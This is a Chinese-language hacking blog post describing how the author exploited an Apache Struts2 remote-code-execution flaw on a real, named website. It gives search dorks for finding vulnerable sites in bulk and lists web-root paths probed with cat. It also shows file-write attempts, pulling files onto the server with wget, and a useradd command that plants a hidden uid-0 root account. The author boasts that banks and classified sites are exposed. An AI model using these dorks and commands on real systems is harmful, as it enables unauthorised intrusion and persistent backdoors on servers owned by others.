原文:http://www.hack1990.com/cat_2/1235.html
這東西一開始下到還不會利用
這篇文章寫的不錯但是關鍵字不咋好用比較少
然後就開始了批量拿了並且自己和朋友也想了一些關鍵字
Inurl:index.action
Inurl:商城.achtion (商城比較多)
Inurl:index.achtion 標題:apache struts2
Inurl:action?id=
沒有NB的關鍵字 只有愛想的腦袋
關鍵字不唯一可能你多想想就能想出更牛的關鍵字
就開始利用吧
Struts2這個漏洞很多大站都存在 比如這個香港電視臺的
不過這個執行命令卡 我就換個搞過的吧 那樣方便演示
一小站 http://www.laipin.com/
這個漏洞一般都是阿帕奇 linux的
所以我們直接讀阿帕奇的配置文件我們可以直接用find 命令
這樣就會出現 那我們隨便讀個看看
/home/httpd
讀了後發現這2都是錯誤的也就是都錯誤的
不過我們有強大的 find的命令
找這個找了一會 不過突然想到了 robots.txt
於是我
然後利用cat 一個一個去讀 不過運氣好
/usr/local/bakresin4/webapps/laipin/robots.txt
/usr/local/webapps/laipin/robots.txt
/usr/local/resin4/webapps/laipin/robots.txt
/usr/local/resin3/webapps/laipin/robots.txt
/usr/local/bak-resin4-bak/webapps/laipin/robots.txt
/var/laipin/robots.txt
/home/ftpfile/laipin/robots.txt
/home/ftpfile/lp/robots.txt
/home/httpd/laipin/robots.txt
/home/httpd/laipin2/robots.txt
第2個就是正確的 不過我全部讀完了 確定就一個和網站的文件是匹配的
既然找到了根目錄
就想 寫文件呀
我用了
Echo bingdao test > /usr/local/webapps/laipin/1.txt (不成功)
Vi /usr/local/webapps/laipin/1.txt (不成功)
Touch /usr/local/webapps/laipin/1.txt (成功 但無法寫入內容)
Mkdir /usr/local/webapps/laipin/123/ (成功 但無內容)
我後來仔細的想了想 也證實了 是由於cd命令執行不成功
但不明確是 不成功 還是無效果(好吧 沒什麼區別)
不過突然記起來了 wooyun一牛提交過某個遠程代碼執行漏洞
看了一下他的細節 發現是用的 wget 下載命令進行添加文件
下載成功後 發現不在根目錄
於是 mv 移動到根目錄
成功 不過發現了一件蛋疼的事 不解析
useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p bingdao
用戶也能添加成功目測工具的危害性,而且目前國內好多銀行網站及涉密的網站,彩票平臺都存在漏洞
這篇文章也就到這了
全文沒什麼亮點 只是一種利用記錄。。
這東西 有時運氣好 滲透時就能秒殺... 平常也可以練下linux命令什麼的還是不錯